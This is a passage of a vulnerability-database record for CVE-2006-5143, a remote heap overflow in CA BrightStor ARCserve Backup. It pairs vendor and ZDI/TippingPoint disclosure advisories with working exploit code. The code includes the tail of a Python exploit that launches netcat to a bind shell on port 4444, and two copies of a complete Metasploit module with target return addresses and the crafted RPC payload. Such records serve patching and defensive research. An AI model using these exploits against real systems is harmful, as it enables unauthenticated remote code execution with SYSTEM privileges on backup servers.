()\r\n\r\n\r\nif __name__==\"__main__\":\r\n try:\r\n target = sys.argv[1]\r\n except IndexError:\r\n print '[+] Computer Associates (CA) Brightstor Backup Mediasvr.exe Remote Exploit'\r\n print '[+] Author: Shirkdog'\r\n print '[+] Usage: %s <target ip>\\n' % sys.argv[0]\r\n sys.exit(-1)\r\n\r\n print '[+] Computer Associates (CA) Brightstor Backup Mediasvr.exe Remote Exploit'\r\n print '[+] Author: Shirkdog'\r\n\r\n GetMediaSvrPort(target)\r\n \r\n print '[+] Exploit sent. Using nc to connect to: %s on port 4444' % target\r\n time.sleep(3)\r\n connect = \"/usr/bin/nc -vn \" + target + \" 4444\"\r\n os.system(connect)\r\n\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/28766/"}, {"lastseen": "2016-02-01T23:47:12", "description": "CA BrightStor ARCserve Message Engine Heap Overflow. CVE-2006-5143. 
Remote exploit for windows platform", "published": "2010-04-30T00:00:00", "type": "exploitdb", "title": "CA BrightStor ARCserve Message Engine Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5143"], "modified": "2010-04-30T00:00:00", "id": "EDB-ID:16401", "href": "https://www.exploit-db.com/exploits/16401/", "sourceData": "##\r\n# $Id: message_engine_heap.rb 9179 2010-04-30 08:40:19Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::DCERPC\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'CA BrightStor ARCserve Message Engine Heap Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a heap overflow in Computer Associates BrightStor ARCserve Backup\r\n\t\t\t\t11.5. 
By sending a specially crafted RPC request, an attacker could overflow the\r\n\t\t\t\tbuffer and execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9179 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2006-5143' ],\r\n\t\t\t\t\t[ 'OSVDB', '29533' ],\r\n\t\t\t\t\t[ 'BID', '20365' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 800,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['Windows 2000 SP4 English', { 'Ret' => 0x7c2f6cc8, 'UEF' => 0x7c54144c } ],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Oct 05 2006',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(6503)\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\thandle = dcerpc_handle('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])\r\n\t\tprint_status(\"Binding to #{handle} ...\")\r\n\r\n\t\tdcerpc_bind(handle)\r\n\t\tprint_status(\"Bound to #{handle} ...\")\r\n\r\n\t\t# straight forward heap stuffz\r\n\t\tsploit = make_nops(680) + \"\\xeb\\x0a\" + make_nops(2) + [ target.ret ].pack('V')\r\n\t\tsploit << [ target['UEF'] ].pack('V') + payload.encoded\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\r\n\t\t\tbegin\r\n\t\t\t\tdcerpc_call(43, sploit)\r\n\t\t\t\trescue Rex::Proto::DCERPC::Exceptions::NoResponse\r\n\t\t\tend\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16401/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:19", 
"bulletinFamily": "software", "cvelist": ["CVE-2006-5143"], "description": "ZDI-06-031: CA Multiple Product Message Engine RPC Server Code \r\n Execution Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-06-031.html\r\nOctober 5, 2006\r\n\r\n-- CVE ID:\r\nCVE-2006-5143\r\n\r\n-- Affected Vendor:\r\nComputer Associates\r\n\r\n-- Affected Products:\r\nBrightStor ARCserve Backup R11.5 Server\r\nBrightStor Enterprise Backup 10.5\r\nBrightStor ARCserve Backup v9.01\r\nCA Server Protection Suite r2\r\nCA Business Protection Suite r2\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability since April 11, 2006 by Digital Vaccine protection\r\nfilter ID 4295, 4348. For further product information on the TippingPoint \r\nIPS:\r\n\r\n http://www.tippingpoint.com \r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Computer Associates BrightStor ARCserve\r\nBackup, Enterprise Backup, Server Protection Suite and Business\r\nProtection Suite. Authentication is not required to exploit this\r\nvulnerability.\r\n\r\nThe problem specifically exists within ASCORE.dll, a DLL used by the\r\nMessage Engine RPC server. This service exposes a heap overflow\r\nvulnerability through RPC opcode 43 (0x2b) and a stack overflow\r\nvulnerability through RPC opcode 45 (0x2d) on TCP port 6503 endpoint\r\nwith ID dc246bf0-7a7a-11ce-9f88-00805fe43838. 
The flaws are exposed\r\nwhen passing long strings as the second parameter to either opcode.\r\n\r\n-- Vendor Response:\r\nComputer Associates has issued an update to correct this vulnerability.\r\nMore details can be found at:\r\n\r\n \r\nhttp://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp\r\n\r\n-- Disclosure Timeline:\r\n2006.04.07 - Vulnerability reported to vendor\r\n2006.04.11 - Digital Vaccine released to TippingPoint customers\r\n2006.10.05 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by livesploit.com.\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, a division of 3Com, The Zero Day Initiative\r\n(ZDI) represents a best-of-breed model for rewarding security\r\nresearchers for responsibly disclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is used.\r\n3Com does not re-sell the vulnerability details or any exploit code.\r\nInstead, upon notifying the affected product vendor, 3Com provides its\r\ncustomers with zero day protection through its intrusion prevention\r\ntechnology. Explicit details regarding the specifics of the\r\nvulnerability are not exposed to any parties until an official vendor\r\npatch is publicly available. 
Furthermore, with the altruistic aim of\r\nhelping to secure a broader user base, 3Com provides this vulnerability\r\ninformation confidentially to security vendors (including competitors)\r\nwho have a vulnerability protection or mitigation product.\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "edition": 1, "modified": "2006-10-06T00:00:00", "published": "2006-10-06T00:00:00", "id": "SECURITYVULNS:DOC:14567", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14567", "title": "[Full-disclosure] ZDI-06-031: CA Multiple Product Message Engine RPC Server Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:19", "bulletinFamily": "software", "cvelist": ["CVE-2006-5143"], "description": "TSRT-06-11: CA Multiple Product DBASVR RPC Server Multiple Buffer\r\n Overflow Vulnerabilities\r\nhttp://www.tippingpoint.com/security/advisories/TSRT-06-11.html\r\nOctober 5, 2006\r\n\r\n-- CVE ID:\r\nCVE-2006-5143\r\n\r\n-- Affected Vendor:\r\nComputer Associates\r\n\r\n-- Affected Products:\r\nBrightStor ARCserve Backup R11.5 Client\r\nBrightStor ARCserve Backup R11.5 Server\r\nBrightStor Enterprise Backup 10.5\r\nBrightStor ARCserve Backup v9.01\r\nCA Server Protection Suite r2\r\nCA Business Protection Suite r2\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability since March 27, 2006 by Digital Vaccine protection\r\nfilter ID 4268. 
For further product information on the TippingPoint IPS:\r\n\r\n http://www.tippingpoint.com \r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Computer Associates BrightStor ARCserve\r\nBackup, Enterprise Backup, Server Protection Suite and Business\r\nProtection Suite. Authentication is not required to exploit this\r\nvulnerability and both client and servers are affected.\r\n\r\nThe problem specifically exists within DBASVR.exe, the Backup Agent RPC\r\nServer. This service exposes a number of vulnerable RPC routines through\r\na TCP endpoint with ID 88435ee0-861a-11ce-b86b-00001b27f656 on port\r\n6071. The most trivial of the exposed vulnerabilities results in an\r\nexploitable stack overflow.\r\n\r\nThe vulnerable routines include:\r\n\r\n /* opcode: 0x01, address: 0x00401A70 */\r\n \r\n long sub_401A70 (\r\n [in][string] char * arg_1,\r\n [in][string] char * arg_2, // stack overflow\r\n [out][size_is(8192), length_is(*arg_4)] char * arg_3,\r\n [in, out] long * arg_4\r\n );\r\n\r\n\r\n /* opcode: 0x02, address: 0x00401CC0*/\r\n \r\n long sub_401CC0 (\r\n [in][string] char * arg_1,\r\n [in][string] char * arg_2, // stack overflow\r\n [in][string] char * arg_3,\r\n [out] long * arg_4\r\n );\r\n\r\n\r\n /* opcode: 0x18, address: 0x004041C0*/\r\n \r\n long sub_4041C0 (\r\n [in][string] char * arg_1,\r\n [in][string] char * arg_2, // stack overflow\r\n [out] long * arg_3\r\n );\r\n\r\nThe first two vulnerable subroutines are the result of inline\r\nstrcpy()/memcpy()'s. 
The third vulnerable subroutine is due to an\r\ninsecure call to lstrcat().\r\n\r\n-- Vendor Response:\r\nComputer Associates has issued an update to correct this vulnerability.\r\nMore details can be found at:\r\n \r\n supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp\r\n\r\n-- Disclosure Timeline:\r\n2006.03.27 - Digital Vaccine released to TippingPoint customers\r\n2006.03.28 - Vulnerability reported to vendor\r\n2006.10.05 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by Pedram Amini, TippingPoint Security\r\nResearch Team.\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "edition": 1, "modified": "2006-10-06T00:00:00", "published": "2006-10-06T00:00:00", "id": "SECURITYVULNS:DOC:14569", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14569", "title": "[Full-disclosure] TSRT-06-11: CA Multiple Product DBASVR RPC Server Multiple Buffer Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:19", "bulletinFamily": "software", "cvelist": ["CVE-2006-5143"], "description": "ZDI-06-030: CA Multiple Product Discovery Service Remote Buffer Overflow\r\n Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-06-030.html\r\nOctober 5, 2006\r\n\r\n-- CVE ID:\r\nCVE-2006-5143\r\n\r\n-- Affected Vendor:\r\nComputer Associates\r\n\r\n-- Affected Products:\r\nBrightStor ARCserve Backup R11.5 Client\r\nBrightStor ARCserve Backup R11.5 Server\r\nBrightStor Enterprise Backup 10.5\r\nBrightStor ARCserve Backup v9.01\r\nCA Server Protection Suite r2\r\nCA Business Protection Suite r2\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against 
this\r\nvulnerability since April 3, 2006 by Digital Vaccine protection\r\nfilter ID 4289. For further product information on the TippingPoint IPS:\r\n\r\n http://www.tippingpoint.com \r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Computer Associates BrightStor ARCserve\r\nBackup, Enterprise Backup, Server Protection Suite and Business\r\nProtection Suite. Authentication is not required to exploit this\r\nvulnerability and both client and servers are affected.\r\n\r\nThe problem specifically exists within the discovery service which\r\ncommunicates initially over UDP port 41524 and then over TCP port\r\n41523. Due to invalid bounds checking during TCP communications, a\r\nstack based buffer overflow may occur in ASBRDCST.DLL during a call to\r\nvsprintf().\r\n\r\n-- Vendor Response:\r\nComputer Associates has issued an update to correct this vulnerability.\r\nMore details can be found at:\r\n\r\n \r\nhttp://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp\r\n\r\n-- Disclosure Timeline:\r\n2006.04.07 - Vulnerability reported to vendor\r\n2006.04.03 - Digital Vaccine released to TippingPoint customers\r\n2006.10.05 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by livesploit.com.\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, a division of 3Com, The Zero Day Initiative\r\n(ZDI) represents a best-of-breed model for rewarding security\r\nresearchers for responsibly disclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is used.\r\n3Com does not re-sell the vulnerability details or any exploit code.\r\nInstead, upon notifying the affected product vendor, 
3Com provides its\r\ncustomers with zero day protection through its intrusion prevention\r\ntechnology. Explicit details regarding the specifics of the\r\nvulnerability are not exposed to any parties until an official vendor\r\npatch is publicly available. Furthermore, with the altruistic aim of\r\nhelping to secure a broader user base, 3Com provides this vulnerability\r\ninformation confidentially to security vendors (including competitors)\r\nwho have a vulnerability protection or mitigation product.\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "edition": 1, "modified": "2006-10-06T00:00:00", "published": "2006-10-06T00:00:00", "id": "SECURITYVULNS:DOC:14566", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14566", "title": "[Full-disclosure] ZDI-06-030: CA Multiple Product Discovery Service Remote Buffer Overflow Vulnerability", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:19", "bulletinFamily": "software", "cvelist": ["CVE-2006-5142", "CVE-2006-5143"], "description": "\r\nTitle: CAID 34693, 34694: CA BrightStor ARCserve Backup Multiple \r\nBuffer Overflow Vulnerabilities\r\n\r\nCA Vulnerability ID (CAID): 34693, 34694\r\n\r\nCA Advisory Date: 2006-10-05\r\n\r\nDiscovered By: TippingPoint, www.zerodayinitiative.com\r\n\r\nImpact: Remote attacker can execute arbitrary code.\r\n\r\nSummary: CA BrightStor ARCserve Backup contains multiple buffer \r\noverflow conditions that allow remote attackers to execute \r\narbitrary code with local SYSTEM privileges on Windows. 
These \r\nissues affect the BrightStor Backup Agent Service, the Job Engine \r\nService, and the Discovery Service in multiple BrightStor ARCserve \r\nBackup application agents and the Base product.\r\n\r\nMitigating Factors: None\r\n\r\nSeverity: CA has given these vulnerabilities a High risk rating.\r\n\r\nAffected Products:\r\nBrightStor Products:\r\n- BrightStor ARCserve Backup r11.5 SP1 and below (SP2 does not \r\n have this vulnerability)\r\n- BrightStor ARCserve Backup r11.1\r\n- BrightStor ARCserve Backup for Windows r11\r\n- BrightStor Enterprise Backup 10.5\r\n- BrightStor ARCserve Backup v9.01 \r\nCA Protection Suites r2:\r\n- CA Server Protection Suite r2\r\n- CA Business Protection Suite r2\r\n- CA Business Protection Suite for Microsoft Small Business Server \r\n Standard Edition r2\r\n- CA Business Protection Suite for Microsoft Small Business Server \r\n Premium Edition r2\r\n\r\nAffected platforms:\r\nMicrosoft Windows\r\n\r\nStatus and Recommendation: \r\nCustomers with vulnerable versions of the BrightStor ARCserve \r\nBackup products should upgrade to the latest versions which are \r\navailable for download from http://supportconnect.ca.com.\r\nSolution Document Reference APARs: \r\nQO82860, QO82863, QO82917, QO82856, QO82858\r\n\r\nDetermining if you are affected: \r\nFor a list of updated files, and instructions on how to verify \r\nthat the security update was fully applied, please review the \r\nInformational Solution referenced in the appropriate Solution \r\nDocument.\r\n\r\nReferences (URLs may wrap): \r\nCA SupportConnect:\r\nhttp://supportconnect.ca.com/\r\nCA SupportConnect Security Notice for this vulnerability:\r\nImportant Security Notice for BrightStor ARCserve Backup (Buffer \r\nOverrun)\r\nhttp://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp\r\nSolution Document Reference APARs: \r\nQO82860, QO82863, QO82917, QO82856, QO82858\r\nCA Security Advisor Research Blog 
posting:\r\nhttp://www3.ca.com/securityadvisor/blogs/posting.aspx?id=90744&pid=93686\r\nCAID: 34693, 34694\r\nCAID Advisory links: \r\nhttp://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34693\r\nhttp://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34694\r\nDiscoverer: TippingPoint\r\nhttp://www.tippingpoint.com/security/advisories/TSRT-06-11.html\r\nhttp://www.tippingpoint.com/security/advisories/TSRT-06-12.html\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-06-030.html\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-06-031.html\r\nCVE Reference: CVE-2006-5142, CVE-2006-5143\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5142\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5143\r\nOSVDB Reference: OSVDB ID: pending\r\nhttp://osvdb.org/\r\n\r\nChangelog for this advisory:\r\nv1.0 - Initial Release\r\n\r\nCustomers who require additional information should contact CA \r\nTechnical Support at http://supportconnect.ca.com.\r\n\r\nFor technical questions or comments related to this advisory,\r\nplease send email to vuln@ca.com, or contact me directly.\r\n\r\nIf you discover a vulnerability in CA products, please report\r\nyour findings to vuln@ca.com, or utilize our "Submit a \r\nVulnerability" form.\r\nURL: http://www3.ca.com/securityadvisor/vulninfo/submit.aspx\r\n\r\n\r\nRegards,\r\nKen Williams ; 0xE2941985\r\nDirector, CA Vulnerability Research\r\n\r\nCA, One CA Plaza. Islandia, NY 11749\r\n \r\nContact http://www3.ca.com/contact/\r\nLegal Notice http://www3.ca.com/legal/\r\nPrivacy Policy http://www3.ca.com/privacy/\r\nCopyright \u00a9 2006 CA. 
All rights reserved.\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "edition": 1, "modified": "2006-10-06T00:00:00", "published": "2006-10-06T00:00:00", "id": "SECURITYVULNS:DOC:14570", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14570", "title": "[Full-disclosure] [CAID 34693, 34694]: CA BrightStor ARCserve Backup Multiple Buffer Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:19", "bulletinFamily": "software", "cvelist": ["CVE-2006-5142", "CVE-2006-5143"], "description": "Our original fixes for the BrightStor ARCserve Backup\r\n\r\nvulnerabilities that we publicly disclosed on 2006-10-05\r\n\r\n(http://www3.ca.com/securityadvisor/blogs/posting.aspx?id=90744&pid=9377\r\n5&date=2006/10)\r\n\r\ndid not completely resolve one of the vulnerabilities.\r\n\r\nConsequently, we have released new fixes that need to be applied.\r\n\r\nPlease note that these do not replace the original fixes. Both\r\n\r\nfixes (each release needs two fixes) need to be applied. 
A revised\r\n\r\nadvisory can be found below, and at this link.\r\n\r\nhttp://www3.ca.com/securityadvisor/blogs/posting.aspx?id=90744&pid=94397\r\n&date=2006/10\r\n\r\nTitle: CAID 34693, 34694: CA BrightStor ARCserve Backup Multiple\r\n\r\nBuffer Overflow Vulnerabilities (UPDATED)\r\n\r\nCA Vulnerability ID (CAID): 34693, 34694\r\n\r\nCA Advisory Date: 2006-10-05\r\n\r\nCA Revised Advisory Date: 2006-10-19\r\n\r\nDiscovered By: TippingPoint, www.zerodayinitiative.com\r\n\r\nImpact: Remote attacker can execute arbitrary code.\r\n\r\nSummary: CA BrightStor ARCserve Backup contains multiple buffer\r\n\r\noverflow conditions that allow remote attackers to execute\r\n\r\narbitrary code with local SYSTEM privileges on Windows. These\r\n\r\nissues affect the BrightStor Backup Agent Service, the Job Engine\r\n\r\nService, and the Discovery Service in multiple BrightStor ARCserve\r\n\r\nBackup application agents and the Base product.\r\n\r\nMitigating Factors: None\r\n\r\nSeverity: CA has given these vulnerabilities a High risk rating.\r\n\r\nAffected Products:\r\n\r\nBrightStor Products:\r\n\r\n- BrightStor ARCserve Backup r11.5 SP1 and below (SP2 does not\r\n\r\nhave this vulnerability)\r\n\r\n- BrightStor ARCserve Backup r11.1\r\n\r\n- BrightStor ARCserve Backup for Windows r11\r\n\r\n- BrightStor Enterprise Backup 10.5\r\n\r\n- BrightStor ARCserve Backup v9.01\r\n\r\nCA Protection Suites r2:\r\n\r\n- CA Server Protection Suite r2\r\n\r\n- CA Business Protection Suite r2\r\n\r\n- CA Business Protection Suite for Microsoft Small Business Server\r\n\r\nStandard Edition r2\r\n\r\n- CA Business Protection Suite for Microsoft Small Business Server\r\n\r\nPremium Edition r2\r\n\r\nAffected platforms:\r\n\r\nMicrosoft Windows\r\n\r\nStatus and Recommendation:\r\n\r\nCustomers with vulnerable versions of the BrightStor ARCserve\r\n\r\nBackup products should upgrade to the latest versions which are\r\n\r\navailable for download from http://supportconnect.ca.com.\r\n\r\nSolution 
Document Reference APARs:\r\n\r\nQO82860, QO82863, QO82917, QO82856, QO82858\r\n\r\nThe original fixes did not completely resolve one of the\r\n\r\nvulnerabilities. Consequently, an additional fix needs to be\r\n\r\napplied. Please note that these do not replace the original fixes.\r\n\r\nBoth fixes (each release needs two fixes) need to be applied.\r\n\r\nSolution Document Reference APARs:\r\n\r\nQO83306, QO83307, QO83308, QO83309\r\n\r\nDetermining if you are affected:\r\n\r\nFor a list of updated files, and instructions on how to verify\r\n\r\nthat the security update was fully applied, please review the\r\n\r\nInformational Solution referenced in the appropriate Solution\r\n\r\nDocument.\r\n\r\nReferences (URLs may wrap):\r\n\r\nCA SupportConnect:\r\n\r\nhttp://supportconnect.ca.com/\r\n\r\nCA SupportConnect Security Notice for this vulnerability:\r\n\r\nImportant Security Notice for BrightStor ARCserve Backup (Buffer\r\n\r\nOverrun)\r\n\r\nhttp://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp\r\n\r\nSolution Document Reference APARs:\r\n\r\nQO82860, QO82863, QO82917, QO82856, QO82858, QO83306, QO83307,\r\n\r\nQO83308, QO83309\r\n\r\nCA Security Advisor Research Blog postings:\r\n\r\nhttp://www3.ca.com/securityadvisor/blogs/posting.aspx?id=90744&pid=93775&date=2006/10\r\n\r\nhttp://www3.ca.com/securityadvisor/blogs/posting.aspx?id=90744&pid=94397&date=2006/10\r\n\r\nCAID: 34693, 34694\r\n\r\nCAID Advisory links:\r\n\r\nhttp://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34693\r\n\r\nhttp://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34694\r\n\r\nDiscoverer: TippingPoint\r\n\r\nhttp://www.tippingpoint.com/security/advisories/TSRT-06-11.html\r\n\r\nhttp://www.tippingpoint.com/security/advisories/TSRT-06-12.html\r\n\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-06-030.html\r\n\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-06-031.html\r\n\r\nCVE Reference: CVE-2006-5142, 
CVE-2006-5143\r\n\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5142\r\n\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5143\r\n\r\nOSVDB References: OSVDB IDs: 29580, 29533, 29534, 29535\r\n\r\nhttp://osvdb.org/29580\r\n\r\nhttp://osvdb.org/29533\r\n\r\nhttp://osvdb.org/29534\r\n\r\nhttp://osvdb.org/29535\r\n\r\nChangelog for this advisory:\r\n\r\nv1.0 - Initial Release\r\n\r\nv2.0 - Advisory updated: new fixes available that must be\r\n\r\ninstalled, IN ADDITION TO the original fixes, to properly\r\n\r\nresolve all of the vulnerability issues. Fixed incorrect\r\n\r\nblog link. Added OSVDB references.\r\n\r\nCustomers who require additional information should contact CA\r\n\r\nTechnical Support at http://supportconnect.ca.com.\r\n\r\nFor technical questions or comments related to this advisory,\r\n\r\nplease send email to vuln (at) ca (dot) com [email concealed], or contact me directly.\r\n\r\nIf you discover a vulnerability in CA products, please report\r\n\r\nyour findings to vuln (at) ca (dot) com [email concealed], or utilize our "Submit a\r\n\r\nVulnerability" form.\r\n\r\nURL: http://www3.ca.com/securityadvisor/vulninfo/submit.aspx\r\n\r\nRegards,\r\n\r\nKen Williams ; 0xE2941985\r\n\r\nDirector, CA Vulnerability Research\r\n\r\nCA, One CA Plaza. Islandia, NY 11749\r\n\r\nContact http://www3.ca.com/contact/\r\n\r\nLegal Notice http://www3.ca.com/legal/\r\n\r\nPrivacy Policy http://www3.ca.com/privacy/\r\n\r\nCopyright \u00a9 2006 CA. 
All rights reserved.\r\n\r\n", "edition": 1, "modified": "2006-10-21T00:00:00", "published": "2006-10-21T00:00:00", "id": "SECURITYVULNS:DOC:14773", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14773", "title": "[CAID 34693, 34694]: CA BrightStor ARCserve Backup Multiple Buffer Overflow Vulnerabilities (UPDATED)", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:10", "description": "", "published": "2009-10-30T00:00:00", "type": "packetstorm", "title": "CA BrightStor ARCserve Message Engine Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5143"], "modified": "2009-10-30T00:00:00", "id": "PACKETSTORM:82935", "href": "https://packetstormsecurity.com/files/82935/CA-BrightStor-ARCserve-Message-Engine-Heap-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::DCERPC \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'CA BrightStor ARCserve Message Engine Heap Overflow', \n'Description' => %q{ \nThis module exploits a heap overflow in Computer Associates BrightStor ARCserve Backup \n11.5. By sending a specially crafted RPC request, an attacker could overflow the \nbuffer and execute arbitrary code. 
\n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2006-5143' ], \n[ 'OSVDB', '29533' ], \n[ 'BID', '20365' ], \n], \n'Privileged' => true, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 800, \n'BadChars' => \"\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n['Windows 2000 SP4 English', { 'Ret' => 0x7c2f6cc8, 'UEF' => 0x7c54144c } ], \n], \n'DisclosureDate' => 'Oct 05 2006', \n'DefaultTarget' => 0)) \n \nregister_options([ Opt::RPORT(6503) ], self.class) \nend \n \ndef exploit \nconnect \n \nhandle = dcerpc_handle('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']]) \nprint_status(\"Binding to #{handle} ...\") \n \ndcerpc_bind(handle) \nprint_status(\"Bound to #{handle} ...\") \n \n# straight forward heap stuffz \nsploit = make_nops(680) + \"\\xeb\\x0a\" + make_nops(2) + [ target.ret ].pack('V') \nsploit << [ target['UEF'] ].pack('V') + payload.encoded \n \nprint_status(\"Trying target #{target.name}...\") \n \nbegin \ndcerpc_call(43, sploit) \nrescue Rex::Proto::DCERPC::Exceptions::NoResponse \nend \n \nhandler \ndisconnect \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": 